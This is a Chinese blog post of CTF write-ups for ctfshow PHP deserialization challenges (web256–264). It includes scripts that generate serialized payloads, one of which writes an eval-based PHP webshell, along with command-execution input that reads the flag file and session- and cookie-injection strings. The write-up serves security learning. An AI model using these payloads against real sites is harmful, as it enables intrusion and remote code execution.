第九周靶场及心得

最新推荐文章于 2024-10-18 14:55:22 发布
最新推荐文章于 2024-10-18 14:55:22 发布
阅读量72 收藏
点赞数
文章标签: php java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vicissitud/article/details/129657000
版权

首先紧接着上周把没有写完的部分写掉

web256

在上题的基础上需要$username不等于$password,生成payload的脚本如下:

<?php 
class ctfShowUser{
   public $username;
   public $isVip;
  public function __construct(){
   $this->isVip=true;
    $this->username='aaa';
 }
}
$a=new ctfShowUser();
echo urlencode(serialize($a));

payload:

在GET处

?username=aaa&password=xxxxxx

在cookie处

user=O%3A11%3A%22ctfShowUser%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A3%3A%22aaa%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

web261

tip:如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法, 则只有 __unserialize() 方法会生效,__wakeup() 方法会被忽略。

所以直接不用理__wakeup(),在来个弱比较877==0x36d就好了。这里不知道为什么,不对反序列化后的结果url编码生成不了。

 
<?php
class ctfshowvip{
    public $username;
    public $password;
 
    public function __construct(){
        $this->username='877.php';
        $this->password='<?php eval($_GET[1]);?>';
    }
}
$a=new ctfshowvip();
echo urlencode(serialize($a));

 访问877.php,然后?1=system('tac /f*');

web263

难点:一开始什么也没有,看到框就想注入(bushi)。看看有什么特殊的文件,发现了www.zip,下载下来进行一个审计。

ini_set('session.serialize_handler', 'php');

//下面这一段更是可控
class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    function __destruct(){
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}

接着找一找有没有可控的session,在index.php下发现:

	if(isset($_SESSION['limit'])){
		$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);

 又发现check.php调用了inc.php

require_once 'inc/inc.php';

接着我们就有了思路,构造一段payload,然后将这个payload作为cookie传入到session,再访问check.php时自动将session解码反序列化,成功赋值,最后访问生成的文件,执行rce。

<?php
class User{
    public $username;
    public $password;
    function __construct(){
        $this->username = "10.php";
        $this->password = '<?php eval($_POST[0]);?>';
    }
}
echo base64_encode("|".serialize(new User()));

 

web264

具体的可以参考下web262,但这个题略难一些,用的是$_SESSION,原来是$_COOKIE,所以我们不能直接修改cookie了。
直接把原来262的值传过去就可以了

f=1&m=1&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck%22;s:5:%22token%22;s:5:%22admin%22;}

if(isset($_COOKIE['msg'])){
xxxx
    }

所以还得随便传个cookie msg=1 

Vicissitud
关注
第九靶场心得(1)
Vicissitud的博客
03-25 88
PHP中的文件包含分为本地文件包含和远程文件包含。(1)本地文件包含在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然是不影响其他功能的执行,比如这里的123的输出。
第八靶场心得
Vicissitud的博客
03-18 973
在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置 信息。这样,当用户在应用程序的 Web 页之间跳转时,存储在 Session 对象中的变量将不会丢失,而 是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web 页时,如果该用户还没有会话, 则 Web 服务器将自动创建一个 Session 对象。当会话过期或被放弃后,服务器将终止该会话。当第一次访问网站时,
第六靶场主要内容及心得
Vicissitud的博客
03-04 135
第六靶场主要内容及心得
第六靶场主要心得(2)
Vicissitud的博客
03-04 127
第六靶场主要心得(2)
dvwa靶场第五练习以及心得(2)
Vicissitud的博客
02-15 199
dvwa靶场第五练习以及心得(2)
新手打 XSS-level(1-13) 靶场心得和总结
m0_73992753的博客
07-13 1050
新手学习 XSS-level(1-13)练级
风炫安全WEB安全学习第四十九节课 靶场的搭建与实战
风炫的博客
02-09 1104
靶场实战 自《网络安全法》实施以后,在互联网上未经授权的渗透测试是违法行为。缺少了实战的战场,我们现在一般用靶场来进行实战的渗透测试学习,因为这样不会影响别人网站服务的正常运行,不会影响到别人的业务。 我在这里推荐几个靶场,然后可以对靶场里面的漏洞进行针对化学习并实战。 线上靶场推荐 https://hack.zkaq.cn/ 封神台,掌控安全的线上靶场 https://www.ichunqiu.com/ I春秋,很早就出来的一个综合的靶场。 https://redtiger.labs.overthewir
pikachu靶场总结
Fly_Mojito的博客
06-03 1236
pikachu靶场总结
BUUCTF靶场练习——第三
weixin_47063945的博客
07-30 156
整理了buuctf靶场第九第十道web题目的做题笔记并整理了涉及到的部分知识和扩展
XSS-lab通关心得
Mild_Wind_Jun的博客
06-21 440
1、无障碍 2、注意要找好回显点,回显点可能有几个,要找对了 3、有时会遇到htmlspecialchars函数,用伪协议或on事件等按情况去绕过 过滤on、script 4、on事件绕过 5、a标签的href属性伪协议绕过 6、大小写绕过 过滤了on、script、href 7、双写绕过 过滤script、on、href 8、编码绕过--卡关了 9、 ...
laravel框架实战学习心得
m0_72526946的博客
06-12 291
众所知,随着信息技术的高速发展并迅速渗透到社会生活的各个方面,计算机日益成为人们的学习,工作,生活不可缺少的基本工具,不会使用计算机,就会像不认字的人一样使人举步维限。但是随着本学期凌老师的带领学习下,学习的加固,兴趣的提升,学习的深入,我逐渐开始认识到计算机世界的精彩,也开始逐渐领悟计算机学习的重要性。总的来说,任何的学习对于我们来说都是进步,而在这个的信息时代,我们不单单要牢牢掌握专业知识,也要紧跟时代的步伐,学好计算机,成长为新时代的优秀人才!所以学习计算机,在学习素质方面,对我有不小的影响。
《Metasploit魔鬼训练营》 第二、三章
oldmoon的博客
03-20 1428
目录 前言 一、靶场环境搭建 1.网络环境拓扑图 2.搭建过程中的 Q&A (1)Kali2xface(NAT模式) (2)metasploitable-Linux (桥接模式 + NAT模式) (3)OWASP (NAT模式) (4)Win2K3(NAT模式) (5)WinXP (仅主机模式) (6)一些问题 二、情报收集 1.流程图 2.外围信息收集 (1)搜索引擎 (2)metasploit辅助模块 (3)一些工具 心得 前言 在看《Web安全攻防--渗透
DC-1靶机的渗透笔记
现代鲁滨逊的博客
03-07 268
环境:靶机—DC-1 (NAT模式)192.168.174.129 攻击机:Kali 192.168.174.128 任务:找齐5个flag 1. 发现主机:sudo arp-scan -l 第一次靶机环境配置错了,没扫出来 其他发现主机命令 arp-scan -l netdiscover -i eth0(网卡)-r 网关 nmap sn 网关/24 还能列出开放的端口 2. 扫描端口: sudo nmap -p- -A 目标IP 开放了22(ssh端口)、80、111、33799端口..
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
热门推荐
杨秀璋的专栏
03-05 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
Web集群服务-代理和负载均衡
qq_775288271的博客
10-15 1277
角色主机名ip代理服务器lb01web服务器nginx_xing用户的请求,登录的请求,经过负载均衡后落到后面的web服务器上,登录的状态/信息也会记录在web服务器上,就会导致不通的web服务器 上,登录状态不统一,造成用户频繁需要登录。
【OSCP Proving Grounds 靶场系列】Slort
Eason_LYC安全白帽子的成长博客
10-14 473
【OSCP Proving Grounds 靶场系列】Slort
信息收集2
Taurus_HanKun的博客
10-16 804
这个文件是为了网络搜索引擎爬虫程序准备的目的就是为了让爬虫文件爬取网站的信息,便于搜索引擎收录网站,存在的风险就是这个目录记录的是网站的目录结构。一直在网站的域名后面添加字符串,如果返回结果是404,表示页面不存在,如果是其他结果的值,说明这个页面是存在的。检查网站的一些小图片,将这些图片的MD5值,和特定的cms中的图片MD5做比对,一样则说明用的是同一个cms。从不同的位置去ping,如果返回的IP地址是相同的,代表没有使用cdn,如不同则代表使用了cdn。
代码审计笔记-PHP
梦想闹钟
10-14 486
代码审计笔记-PHP
使用ROS资源编排一键部署LNMP建站环境,手动整理教程
最新发布
facaixxx2024的博客
10-18 826
LNMP是目前主流的网站服务器架构之一,适合运行大型和高并发的网站应用,例如电子商务网站、社交网络、内容管理系统等。对模板内Parameters定义的参数进行分组,并且可以为每一组分别定义标签。本示例中,模板定义的参数包括:镜像ID、实例规格、软件下载地址以及软件配置项等。定义模板将要创建的阿里云资源。本示例中,声明将要创建一台VPC类型的ECS实例和一个安全组,这里声明的资源属性可以引用。定义资源创建完成后,栈需要输出的资源信息。(必填)设置ECS实例使用的实例规格。设置ECS实例的系统盘的云盘类型。
网络安全靶场的作用及攻防实战心得分享
资源摘要信息:"网络安全靶场的构建与运用" 网络安全靶场是信息安全领域中一个不可或缺的重要组成部分,它为网络安全从业者提供了一个模拟实际网络环境、进行安全测试和攻防对抗的平台。本部分将详细解析网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值